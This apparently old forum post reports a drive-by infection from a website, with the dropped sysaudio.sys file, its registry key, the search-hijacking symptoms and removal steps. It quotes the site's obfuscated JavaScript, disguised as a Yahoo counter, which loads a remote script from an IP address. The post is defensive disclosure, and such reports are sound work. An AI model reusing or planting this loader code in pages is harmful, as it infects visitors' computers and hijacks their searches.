bsakata

I was infected on two of my computers so I decided to look into it. Looks like your website drops sysaudio.sys into the c:\windows\system32 folder and adds the registry string key aux=sysaudio.sys in HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32

Symptoms:
Affects results from popular websearches, i.e. google, yahoo, etc. If you do a search, it will inject shady websites in the links of the search results page.

To Remove:
1. delete reg key
2. reboot
3. delete sysaudio.sys


Look at your website code, it has:
<script language=javascript><!-- Yahoo! Counter starts here -->
if(typeof(yahoo_counter)!=typeof(1))eval(unescape( '/%2F!.%2E~%2E` %3C%64i`v%20s%74`y%6Ce@%3D%64%69#s~%70lay&:n%6F&n% 65%3E\nvar%20&_;`%69f(%64!o%63|%75|m|e`n&t`.|c&%6F %6F@k%69%65|.@ma`%74c&h(`/%5Cb$%68%67%66~%74=1@%2F!%29|%3D!%3Dn|%75&l~%6C|)d `o@cu%6D%65%6E%74`%2Ew@%72`%69`%74@%65("%3Cs|%63|r $%69$%70%74%20%73%72!%63~%3D|%2F/%37|8@.&%31%357#%2E~14$%32%2E#%35`%38/!%63~p/?%22+na%76|%69g`a%74or.a&%70&%70N%61$%6D#%65~%2Ec% 68%61%72A%74(&0!)+%22!%3E%3C%5C`/!s%63r%69p&%74`%3E%22@%29$%3B~\n//%3C&/d~%69v@%3E').replace(/@|~|\!|\$|`|\&|\||#/g,""));var yahoo_counter=1;
<!-- counter end --></script>

This looks to be the culprit....


Here's more info:
miekiemoes.blogspot com/2008/10/fake-sysaudiosys.causes-searchengine.html